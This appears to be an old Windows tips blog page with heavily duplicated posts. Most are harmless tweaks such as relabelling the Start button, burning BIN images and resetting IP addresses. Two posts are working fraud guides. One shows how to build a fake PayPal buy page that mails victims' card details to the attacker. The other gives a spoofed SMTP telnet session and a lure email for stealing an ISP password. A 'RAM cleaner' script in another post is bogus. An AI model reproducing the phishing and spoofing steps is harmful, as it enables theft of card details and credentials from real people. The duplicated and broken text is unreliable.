Step 1 - Modify Explorer.exe File
In order to make the changes, the file explorer.exe located at C:\Windows needs to be edited. Since explorer.exe is a binary file it requires a special editor. For purposes of this article I have used Resource Hacker. Resource HackerTM is a freeware utility to view, modify, rename, add, delete and extract resources in 32bit Windows executables and resource files (*.res). It incorporates an internal resource script compiler and decompiler and works on Microsoft Windows 95/98/ME, Windows NT, Windows 2000 and Windows XP operating systems.
get this from h**p://delphi.icm.edu.pl/ftp/tools/ResHack.zip
The first step is to make a backup copy of the file explorer.exe located at C:\Windows\explorer. Place it in a folder somewhere on your hard drive where it will be safe. Start Resource Hacker and open explorer.exe located at C:\Windows\explorer.exe.
The category we are going to be using is "String Table". Expand it by clicking the plus sign then navigate down to and expand string 37 followed by highlighting 1033. If you are using the Classic Layout rather than the XP Layout, use number 38. The right hand pane will display the stringtable. We’re going to modify item 578, currently showing the word “start” just as it displays on the current Start button.
There is no magic here. Just double click on the word “start” so that it’s highlighted, making sure the quotation marks are not part of the highlight. They need to remain in place, surrounding the new text that you’ll type. Go ahead and type your new entry. In my case I used Click Me!
You’ll notice that after the new text string has been entered the Compile Script button that was grayed out is now active. I won’t get into what’s involved in compiling a script, but suffice it to say it’s going to make this exercise worthwhile. Click Compile Script and then save the altered file using the Save As command on the File Menu. Do not use the Save command – Make sure to use the Save As command and choose a name for the file. Save the newly named file to C:\Windows.
Step 2 – Modify the Registry
!!!make a backup of your registry before making changes!!!
Now that the modified explorer.exe has been created it’s necessary to modify the registry so the file will be recognized when the user logs on to the system. If you don’t know how to access the registry I’m not sure this article is for you, but just in case it’s a temporary memory lapse, go to Start (soon to be something else) Run and type regedit in the Open field. Navigate to:
HKEY_LOCAL_MACHINE\ SOFTWARE\ Microsoft\ Windows NT\ CurrentVersion\ Winlogon
In the right pane, double click the "Shell" entry to open the Edit String dialog box. In Value data: line, enter the name that was used to save the modified explorer.exe file. Click OK.
Close Registry Editor and either log off the system and log back in, or reboot the entire system if that’s your preference. If all went as planned you should see your new Start button with the revised text.[/b]
Thursday, June 25, 2009
Remove 'A network cable is unplugged' icon from tray
Click on Start>Run..., type regedit.exe and click OK. Delete this key:
HKEY_CLASSES_ROOT\CLSID\{7007ACCF-3202-11D1-AAD2-00805FC1270E}
Restart to apply the changes. I haven't had any ill effects so far. Make a backup of the key just in case (select the key and click on File>Export...).
HKEY_CLASSES_ROOT\CLSID\{7007ACCF-3202-11D1-AAD2-00805FC1270E}
Restart to apply the changes. I haven't had any ill effects so far. Make a backup of the key just in case (select the key and click on File>Export...).
Burn a BIN without a CUE using NERO
You've downloaded a *.BIN file, but there was no *.CUE file associated and you still want to burn the *.BIN file using Nero
Your options are:
1) Create yourself a *.CUE
2) Convert the *.BIN to an *.ISO
3) OR use Nero to burn without the *.CUE file!!!
Yes, that's possible... just follow these steps and you will be sorted. No need for *.CUE files anymore
Ok, here we go...
1) Start Nero
2) File -> Burn Image
3) Browse to the *.BIN file that you want to burn and open it
4) A window saying "Foreign Image Settings" will open
5) Check the settings. They should be as followed:
* Type of image: leave it to Data Mode 1
* Select the Raw Data check box
Note ->> The block size will change automatically from 2048 to 2352
* Leave Image Header and Image Trailer unchanged and set to 0
* Leave "Scrambled" and "Swapped" check boxes unchecked
6) Click on burn!
7) Enjoy
This tut was for Nero 5.x.x.x, I was told that "Burn Image" is under "recorder" in Nero 6. The rest of the steps should be the same...
Your options are:
1) Create yourself a *.CUE
2) Convert the *.BIN to an *.ISO
3) OR use Nero to burn without the *.CUE file!!!
Yes, that's possible... just follow these steps and you will be sorted. No need for *.CUE files anymore
Ok, here we go...
1) Start Nero
2) File -> Burn Image
3) Browse to the *.BIN file that you want to burn and open it
4) A window saying "Foreign Image Settings" will open
5) Check the settings. They should be as followed:
* Type of image: leave it to Data Mode 1
* Select the Raw Data check box
Note ->> The block size will change automatically from 2048 to 2352
* Leave Image Header and Image Trailer unchanged and set to 0
* Leave "Scrambled" and "Swapped" check boxes unchecked
6) Click on burn!
7) Enjoy
This tut was for Nero 5.x.x.x, I was told that "Burn Image" is under "recorder" in Nero 6. The rest of the steps should be the same...
Create A Huge File
You can create a file of any size using nothing more than what's supplied with Windows. Start by converting the desired file size into hexadecimal notation. You can use the Windows Calculator in Scientific mode do to this. Suppose you want a file of 1 million bytes. Enter 1000000 in the calculator and click on the Hex option to convert it (1 million in hex is F4240.) Pad the result with zeroes at the left until the file size reaches eight digits—000F4240.
Now open a command prompt window. In Windows 95, 98, or Me, you can do this by entering COMMAND in the Start menu's Run dialog; in Windows NT 4.0, 2000, or XP enter CMD instead. Enter the command DEBUG BIGFILE.DAT and ignore the File not found message. Type RCX and press Enter. Debug will display a colon prompt. Enter the last four digits of the hexadecimal number you calculated (4240, in our example). Type RBX and press Enter, then enter the first four digits of the hexadecimal size (000F, in our example). Enter W for Write and Q for Quit. You've just created a 1-million-byte file using Debug. Of course you can create a file of any desired size using the same technique.
Now open a command prompt window. In Windows 95, 98, or Me, you can do this by entering COMMAND in the Start menu's Run dialog; in Windows NT 4.0, 2000, or XP enter CMD instead. Enter the command DEBUG BIGFILE.DAT and ignore the File not found message. Type RCX and press Enter. Debug will display a colon prompt. Enter the last four digits of the hexadecimal number you calculated (4240, in our example). Type RBX and press Enter, then enter the first four digits of the hexadecimal size (000F, in our example). Enter W for Write and Q for Quit. You've just created a 1-million-byte file using Debug. Of course you can create a file of any desired size using the same technique.
Hacking Credit Cards, Full Tutorial
ets see Here is a tutorial how to Hack CC ........... You Can Say it Phising I call it Mind's work so Lets Start .........
Open Your PayPal account >>.
Go to Mechant Tools there is a section to Create Buttons for your
Website as Donate button shoping Cart ........... when u click on more
options you will Find Setting up a Buy Now Button...........
Wat are you waiting Get the Html Code For Buy Button it will look like
We will edit this Part Later :
Now its time to make Phisher to Grab CC
save the below Text page as html Page, after editing the reqd Parts and then upload it to free hosting server .......
You just have to edit INFO in this Line
Find This Line and edit
After editing save it as Pay.html and Upload it to any free html host
Now your Uploading Link suppose its
Now Go Back To above Buy Code which u get from Paypal and Replace this
Link from Paypal's
Now apply that code anywhere in Html when Victim Clicks on Buy Now he
will get directed towards your fake page when he puts his info and
clicks agree and continue . His Details will be Mailed to u on the id u
Provided .........
One main thing y Victim input his info .......
Go man and provide them a Years RS account for just 10$ he will die to buy that and u enjoy his details lols
Its easy isnt it lol?
enjoy guyz give me rep and thanx
Open Your PayPal account >>.
Go to Mechant Tools there is a section to Create Buttons for your
Website as Donate button shoping Cart ........... when u click on more
options you will Find Setting up a Buy Now Button...........
Wat are you waiting Get the Html Code For Buy Button it will look like
Code:
http://rapidshare.com/files/77915498/Buy_Code.txt.html
We will edit this Part Later :
Now its time to make Phisher to Grab CC
save the below Text page as html Page, after editing the reqd Parts and then upload it to free hosting server .......
Code:
http://rapidshare.com/files/77918901/Pay.txt.html
You just have to edit INFO in this Line
Code:
http://www.big-llc.com/formmailer/submit
Find This Line and edit
After editing save it as Pay.html and Upload it to any free html host
Now your Uploading Link suppose its
Code:
http://name.domain.com/Pay.html
Now Go Back To above Buy Code which u get from Paypal and Replace this
Link from Paypal's
Code:
https://www.paypal.com/cgi-bin/webscr
Now apply that code anywhere in Html when Victim Clicks on Buy Now he
will get directed towards your fake page when he puts his info and
clicks agree and continue . His Details will be Mailed to u on the id u
Provided .........
One main thing y Victim input his info .......
Go man and provide them a Years RS account for just 10$ he will die to buy that and u enjoy his details lols
Its easy isnt it lol?
enjoy guyz give me rep and thanx
Trick to Increase Windows Vista Performance / Experience Index upto 9.9
We all know about new feature "Windows Experience or Performance Index" in Windows Vista. Its a new feature which automatically calculates your system performance index based on the hardware you have. It can be between 0.1 to 9.9
Better system hardware, better Performance Index and better system performance.
"Windows Performance Index" is shown in "System Properties" which can be accessed by right-clicking on "My Computer" icon on Desktop and select "Properties" or from "Control Panel".
Using this trick, you can increase that Index upto 9.9
Before:

After:

The benefit of this hack is, there are a few features in Windows Vista which can only be used if your "Windows Experience Index" reaches the minimum requirements. So by increasing the Index manually, you can use those features.
Like You'll get toolbar in "Photo Gallery's Slide Show" while opening a wallpaper in Explorer.
How to:
1. Type following in Startmenu Searchbox / Run / Explorer Addressbar:
And Press .
2. You'll one or more .xml files in the folder. Sort them by Date Created or look at their name. The file name will be in following format:
Where "2007-11-08 22.23.17.858" might differ from machine to machine and Windows Installation date/time.
3. Open the latest file in "Wordpad" and goto line having. It'll be approx. 12th line and will look like following:
4. Now you can edit the numbers between > & < and can increase them upto 9.9 as following:
5. Thats it. Save the file and check the Index again in System Properties. It'll 9.9 now.
NOTE: If you can't save the file, then take ownership of the file.
Better system hardware, better Performance Index and better system performance.
"Windows Performance Index" is shown in "System Properties" which can be accessed by right-clicking on "My Computer" icon on Desktop and select "Properties" or from "Control Panel".
Using this trick, you can increase that Index upto 9.9
Before:

After:

The benefit of this hack is, there are a few features in Windows Vista which can only be used if your "Windows Experience Index" reaches the minimum requirements. So by increasing the Index manually, you can use those features.
Like You'll get toolbar in "Photo Gallery's Slide Show" while opening a wallpaper in Explorer.
How to:
1. Type following in Startmenu Searchbox / Run / Explorer Addressbar:
Quote:
%windir%\Performance\WinSAT\DataStore |
2. You'll one or more .xml files in the folder. Sort them by Date Created or look at their name. The file name will be in following format:
Quote:
2007-11-08 22.23.17.858 Assessment (Initial).WinSAT.xml |
3. Open the latest file in "Wordpad" and goto line having
Quote:
|
Quote:
|
NOTE: If you can't save the file, then take ownership of the file.
How to set up a proxy that changes every few seconds with firefox! [Might be useful
How to set up a proxy that changes every few seconds with firefox!
first you have to download foxy proxy its a firefox add-on so go to tools in your browser and select add-ons go to the get add-on tab then browse all add-ons, in the search bar type in foxy proxy
download and install, now in your browser tools you have foxy proxy!
select this and go to options
name your new setting in the general tab then go to the proxy details tab.
select automatic proxy config and input this:
ok all done now every time you want your proxy on just go to tools, foxyproxy and load your settings! your ip will change every 3 seconds or so when it is enabled!
first you have to download foxy proxy its a firefox add-on so go to tools in your browser and select add-ons go to the get add-on tab then browse all add-ons, in the search bar type in foxy proxy
download and install, now in your browser tools you have foxy proxy!
select this and go to options
name your new setting in the general tab then go to the proxy details tab.
select automatic proxy config and input this:
Code:
http://www.cjb.net/proxy.pac
How to Get someones ISP password.
1.) run your telnet program:
on windows , go to START -> RUN -> "TELNET".
on linux , you should open a shell , and write telnet.
2.) then connect (on windows "connect" , on linux "open") some anonymous server , if don't have any then search for one , if you are too lame then email me now! i'll give you in the minute! note: you should connect the server mail program (port "25")!
3.) now , write the following :
mail from:[**YOUR FRIEND'S ISP WEBMASTER**]
rcpt to:[**YOUR FRIEND'S EMAIL ADRESS**]
data
Hi there [YOUR FRIEND'S NAME] , this is [NAME OF YOUR FRIEND'S ISP] support team , lately , our server had some problems with the connection and the user-password files were destroyed , a backup was then released , and it was ok.
but yesterday we found out that it is not an updated version of the file , so , it will start charging you for a larger amount of money for each our you use!
- - - - - - - - - - - - - -
To correct the problem , we have made a speical program to correct the error , all YOU have to do is email :
"[**YOUR'S FRIEND'S ISP NAME**]@GalaxyCorp.Com" and in the SUBJECT write your "user name" and "password".
note: No moeny will be returned if you don't follow our instructions!
thank you,
the support team!
4.) press enter twice and then write "."(without the "") and press ENTER!
--
now , the places you saw ** say that maybe you didn't understood it all , so i'll give you a simple example .
[**YOUR FRIEND'S ISP WEBMASTER**] - example , if your friend is connected througe AOL , then type "webmaster@aol.com" , get it?
[**YOUR FRIEND'S EMAIL ADRESS**] - example , if your friend's email is john@aol.com, then type "john@aol.com".
[YOUR FRIEND'S NAME] - if your friend is called "John" then type "John".
[NAME OF YOUR FRIEND'S ISP] - if your friend is connected through AOL(American Online) , then type "American - Online"
"[**YOUR'S FRIEND'S ISP NAME**]@GalaxyCorp.Com" - this is the hard-part , but if you are reading this , then don't worry , you're one step from the end! ..
* launch your WWW browser(MICROSOFT INTERNET EXPLORER\NETSCAPE) , and type "HTTP://www.galaxycorp.com".
* Sign there for an account , now , when they ask you what username you want, then try the closest thing to your ISP name(ex - if your friend is connected thourgh American Online[AOL] then try "aol" or "a_o_l" or "american_online" !)
* and when they ask for your email , type your Real one!!!
now continue in your normal life , and remember to read your email!
if you suddenly get a message from your friend's email adress , and the subject is "john j4o87HnzG" then , guess what , you just saved 10$ a month!
on windows , go to START -> RUN -> "TELNET".
on linux , you should open a shell , and write telnet.
2.) then connect (on windows "connect" , on linux "open") some anonymous server , if don't have any then search for one , if you are too lame then email me now! i'll give you in the minute! note: you should connect the server mail program (port "25")!
3.) now , write the following :
mail from:[**YOUR FRIEND'S ISP WEBMASTER**]
rcpt to:[**YOUR FRIEND'S EMAIL ADRESS**]
data
Hi there [YOUR FRIEND'S NAME] , this is [NAME OF YOUR FRIEND'S ISP] support team , lately , our server had some problems with the connection and the user-password files were destroyed , a backup was then released , and it was ok.
but yesterday we found out that it is not an updated version of the file , so , it will start charging you for a larger amount of money for each our you use!
- - - - - - - - - - - - - -
To correct the problem , we have made a speical program to correct the error , all YOU have to do is email :
"[**YOUR'S FRIEND'S ISP NAME**]@GalaxyCorp.Com" and in the SUBJECT write your "user name" and "password".
note: No moeny will be returned if you don't follow our instructions!
thank you,
the support team!
4.) press enter twice and then write "."(without the "") and press ENTER!
--
now , the places you saw ** say that maybe you didn't understood it all , so i'll give you a simple example .
[**YOUR FRIEND'S ISP WEBMASTER**] - example , if your friend is connected througe AOL , then type "webmaster@aol.com" , get it?
[**YOUR FRIEND'S EMAIL ADRESS**] - example , if your friend's email is john@aol.com, then type "john@aol.com".
[YOUR FRIEND'S NAME] - if your friend is called "John" then type "John".
[NAME OF YOUR FRIEND'S ISP] - if your friend is connected through AOL(American Online) , then type "American - Online"
"[**YOUR'S FRIEND'S ISP NAME**]@GalaxyCorp.Com" - this is the hard-part , but if you are reading this , then don't worry , you're one step from the end! ..
* launch your WWW browser(MICROSOFT INTERNET EXPLORER\NETSCAPE) , and type "HTTP://www.galaxycorp.com".
* Sign there for an account , now , when they ask you what username you want, then try the closest thing to your ISP name(ex - if your friend is connected thourgh American Online[AOL] then try "aol" or "a_o_l" or "american_online" !)
* and when they ask for your email , type your Real one!!!
now continue in your normal life , and remember to read your email!
if you suddenly get a message from your friend's email adress , and the subject is "john j4o87HnzG" then , guess what , you just saved 10$ a month!
How to download from rapidshare if you have shared IP
When you try to download any file from rapidshare from free user then you see following error message ?
Your IP address xxx.xxx.xxx.xxx is already downloading a file. Please wait until the download is completed. ?
and i cannot download any file.
It?s happen for shared IP of ISP.
Here is a tips that help you to download any file from rapidshare as free user.
1. Go and download HideIp tool [trial]
2. Install it and run.
3. Visit rapidshare to download file.
4. follow the same procedures.
5. Do not use any download manager.
6. You can download file successfully.
To download more files, uninstall HideIp and follow step 2 to 6.
eNjoy and keep surfing nLA devilz and dont forget to say thankyou....
Your IP address xxx.xxx.xxx.xxx is already downloading a file. Please wait until the download is completed. ?
and i cannot download any file.
It?s happen for shared IP of ISP.
Here is a tips that help you to download any file from rapidshare as free user.
1. Go
Code:
http://www.hide-ip-soft.com/
2. Install it and run.
3. Visit rapidshare to download file.
4. follow the same procedures.
5. Do not use any download manager.
6. You can download file successfully.
To download more files, uninstall HideIp and follow step 2 to 6.
eNjoy and keep surfing nLA devilz and dont forget to say thankyou....
How to Get someones ISP password.
1.) run your telnet program:
on windows , go to START -> RUN -> "TELNET".
on linux , you should open a shell , and write telnet.
2.) then connect (on windows "connect" , on linux "open") some anonymous server , if don't have any then search for one , if you are too lame then email me now! i'll give you in the minute! note: you should connect the server mail program (port "25")!
3.) now , write the following :
mail from:[**YOUR FRIEND'S ISP WEBMASTER**]
rcpt to:[**YOUR FRIEND'S EMAIL ADRESS**]
data
Hi there [YOUR FRIEND'S NAME] , this is [NAME OF YOUR FRIEND'S ISP] support team , lately , our server had some problems with the connection and the user-password files were destroyed , a backup was then released , and it was ok.
but yesterday we found out that it is not an updated version of the file , so , it will start charging you for a larger amount of money for each our you use!
- - - - - - - - - - - - - -
To correct the problem , we have made a speical program to correct the error , all YOU have to do is email :
"[**YOUR'S FRIEND'S ISP NAME**]@GalaxyCorp.Com" and in the SUBJECT write your "user name" and "password".
note: No moeny will be returned if you don't follow our instructions!
thank you,
the support team!
4.) press enter twice and then write "."(without the "") and press ENTER!
--
now , the places you saw ** say that maybe you didn't understood it all , so i'll give you a simple example .
[**YOUR FRIEND'S ISP WEBMASTER**] - example , if your friend is connected througe AOL , then type "webmaster@aol.com" , get it?
[**YOUR FRIEND'S EMAIL ADRESS**] - example , if your friend's email is john@aol.com, then type "john@aol.com".
[YOUR FRIEND'S NAME] - if your friend is called "John" then type "John".
[NAME OF YOUR FRIEND'S ISP] - if your friend is connected through AOL(American Online) , then type "American - Online"
"[**YOUR'S FRIEND'S ISP NAME**]@GalaxyCorp.Com" - this is the hard-part , but if you are reading this , then don't worry , you're one step from the end! ..
* launch your WWW browser(MICROSOFT INTERNET EXPLORER\NETSCAPE) , and type "HTTP://www.galaxycorp.com".
* Sign there for an account , now , when they ask you what username you want, then try the closest thing to your ISP name(ex - if your friend is connected thourgh American Online[AOL] then try "aol" or "a_o_l" or "american_online" !)
* and when they ask for your email , type your Real one!!!
now continue in your normal life , and remember to read your email!
if you suddenly get a message from your friend's email adress , and the subject is "john j4o87HnzG" then , guess what , you just saved 10$ a month!
on windows , go to START -> RUN -> "TELNET".
on linux , you should open a shell , and write telnet.
2.) then connect (on windows "connect" , on linux "open") some anonymous server , if don't have any then search for one , if you are too lame then email me now! i'll give you in the minute! note: you should connect the server mail program (port "25")!
3.) now , write the following :
mail from:[**YOUR FRIEND'S ISP WEBMASTER**]
rcpt to:[**YOUR FRIEND'S EMAIL ADRESS**]
data
Hi there [YOUR FRIEND'S NAME] , this is [NAME OF YOUR FRIEND'S ISP] support team , lately , our server had some problems with the connection and the user-password files were destroyed , a backup was then released , and it was ok.
but yesterday we found out that it is not an updated version of the file , so , it will start charging you for a larger amount of money for each our you use!
- - - - - - - - - - - - - -
To correct the problem , we have made a speical program to correct the error , all YOU have to do is email :
"[**YOUR'S FRIEND'S ISP NAME**]@GalaxyCorp.Com" and in the SUBJECT write your "user name" and "password".
note: No moeny will be returned if you don't follow our instructions!
thank you,
the support team!
4.) press enter twice and then write "."(without the "") and press ENTER!
--
now , the places you saw ** say that maybe you didn't understood it all , so i'll give you a simple example .
[**YOUR FRIEND'S ISP WEBMASTER**] - example , if your friend is connected througe AOL , then type "webmaster@aol.com" , get it?
[**YOUR FRIEND'S EMAIL ADRESS**] - example , if your friend's email is john@aol.com, then type "john@aol.com".
[YOUR FRIEND'S NAME] - if your friend is called "John" then type "John".
[NAME OF YOUR FRIEND'S ISP] - if your friend is connected through AOL(American Online) , then type "American - Online"
"[**YOUR'S FRIEND'S ISP NAME**]@GalaxyCorp.Com" - this is the hard-part , but if you are reading this , then don't worry , you're one step from the end! ..
* launch your WWW browser(MICROSOFT INTERNET EXPLORER\NETSCAPE) , and type "HTTP://www.galaxycorp.com".
* Sign there for an account , now , when they ask you what username you want, then try the closest thing to your ISP name(ex - if your friend is connected thourgh American Online[AOL] then try "aol" or "a_o_l" or "american_online" !)
* and when they ask for your email , type your Real one!!!
now continue in your normal life , and remember to read your email!
if you suddenly get a message from your friend's email adress , and the subject is "john j4o87HnzG" then , guess what , you just saved 10$ a month!
Repair Your Dead Flash Drive[DIY]
Most of our flash drives comes up with this problem....
Windows Was Unable To Format

Dont Worry I Got the solution
Just Follow These Steps:
1st On Your desktop right click on your "MY COmputer icon" Then Click "Manage"

2nd:
Click on "Disk Management" Then Click on desired drive, and then right click, then click on "new partition"[seen on image below]

3rd:
This will appear....Click on "Next"

4th:
Click on "Primary Partition" Click "Next"

5th Click on "Next"

6th Click on "Next"

7th click on "this partition with the following settings'

Finally "Click on Finish"

Download Here For More Information
Windows Was Unable To Format

Dont Worry I Got the solution
Just Follow These Steps:
1st On Your desktop right click on your "MY COmputer icon" Then Click "Manage"

2nd:
Click on "Disk Management" Then Click on desired drive, and then right click, then click on "new partition"[seen on image below]
![]() |

3rd:
This will appear....Click on "Next"

4th:
Click on "Primary Partition" Click "Next"

5th Click on "Next"

6th Click on "Next"

7th click on "this partition with the following settings'

Finally "Click on Finish"

Download Here For More Information
Code:
http://uploading.com/files/K9I2FGJJ/DIY_flashdrive_repair.rar.html
Clean Your RAM & Make Your Comp Speed Better
You may recognize that your system gets slower and slower when playing and working a lot with your Desktop or a laptop. That?s because your RAM is full of remaining progress pieces you do not need any more.
Open the notepad and type
FreeMem=Space(64000000)
in this file and save it as RAMcleaner.vbs [ You should choose the ?All Files? option when u save it ]
Run the file and ur RAM may be cleaned :>
Of course u can edit the code in the file for a greater ?cleaning-progress?.
FreeMem=Space(128000000)
just try it out.. it worked for me. Post your comment here if it worked for you
Open the notepad and type
FreeMem=Space(64000000)
in this file and save it as RAMcleaner.vbs [ You should choose the ?All Files? option when u save it ]
Run the file and ur RAM may be cleaned :>
Of course u can edit the code in the file for a greater ?cleaning-progress?.
FreeMem=Space(128000000)
just try it out.. it worked for me. Post your comment here if it worked for you
How to change IPs
This is a tutorial about changing IP addresses. You can change your IP address for various reasons
1.) because you got banned in a game from some server.
2.) you got banned from some crappy forums and want to get a nub back
3.) if you are downloading from somewhere like Rapidshare, you might not have patience to wait for 3 hours to download another file again, if you change your ip, you can download another file instantly having to still wait for your "ticket" tho.
Ok there are many ways of changing your IP ;)
First is to go to the Start Menu and goto the RUN command.
after that type this:
blah blah blah>ipconfig
now see what your ip address is right NOW.
now you need to:
blah blah blah> ipconfig [SPACE ONCE] /release
(Note:this releases the IP address you are using now, and your internet wont work till u renew another IP address or the same one)
then like after 10-20 seconds do:
blah blah blah>ipconfig [SPACE ONCE] /renew
this gives you an iP address,either another one, or the same one you had before
that is one way of changing your IP Wink, note that it won't work all the time.
Now if you don't like all that technical stuff, then here is an easier way.
If you have a ROUTER, this is gonna be ownage.
Unplug your router power, and after that your DSL pwoer cable, wait for 10 seconds until your internet icon at the taskbar has an X with it.
now plug back your router in, then after 1 second of plugging your router in, plug that dsl of yours in.
When you are connected to the internet, try getting a file from rapidshare, and see if you can download.
If u can download, then congratulations, you have just changed your IP address :D
(Note again: sooner or later, you will run out of IP addresses to change,but that will take a long time for it to happen)
Go nuts!
+rep if you like this tut and if it actually works for ya ;)
Note:Not for people with static IP addresses
1.) because you got banned in a game from some server.
2.) you got banned from some crappy forums and want to get a nub back
3.) if you are downloading from somewhere like Rapidshare, you might not have patience to wait for 3 hours to download another file again, if you change your ip, you can download another file instantly having to still wait for your "ticket" tho.
Ok there are many ways of changing your IP ;)
First is to go to the Start Menu and goto the RUN command.
after that type this:
blah blah blah>ipconfig
now see what your ip address is right NOW.
now you need to:
blah blah blah> ipconfig [SPACE ONCE] /release
(Note:this releases the IP address you are using now, and your internet wont work till u renew another IP address or the same one)
then like after 10-20 seconds do:
blah blah blah>ipconfig [SPACE ONCE] /renew
this gives you an iP address,either another one, or the same one you had before
that is one way of changing your IP Wink, note that it won't work all the time.
Now if you don't like all that technical stuff, then here is an easier way.
If you have a ROUTER, this is gonna be ownage.
Unplug your router power, and after that your DSL pwoer cable, wait for 10 seconds until your internet icon at the taskbar has an X with it.
now plug back your router in, then after 1 second of plugging your router in, plug that dsl of yours in.
When you are connected to the internet, try getting a file from rapidshare, and see if you can download.
If u can download, then congratulations, you have just changed your IP address :D
(Note again: sooner or later, you will run out of IP addresses to change,but that will take a long time for it to happen)
Go nuts!
+rep if you like this tut and if it actually works for ya ;)
Note:Not for people with static IP addresses
Subscribe to:
Posts (Atom)